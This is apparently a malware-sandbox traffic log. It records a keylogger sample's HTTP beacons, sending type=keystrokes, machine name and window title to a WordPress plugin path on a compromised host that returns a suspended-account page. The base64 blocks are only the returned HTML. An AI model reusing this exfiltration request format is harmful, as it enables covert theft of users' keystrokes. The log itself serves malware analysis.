ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2016 04:55:15 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
48 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20PM text/html post.php 302 Found HTML 379.0 B 01/26/67 01:29:26
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9ODo1
NSUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
2cc1e1d05ca3ff9d103ea31c0dda24ff549a47806a77e7569621047d814ab24e
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Sat, 03 Dec 2016 04:55:15 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
49 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 01/26/67 02:11:10
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
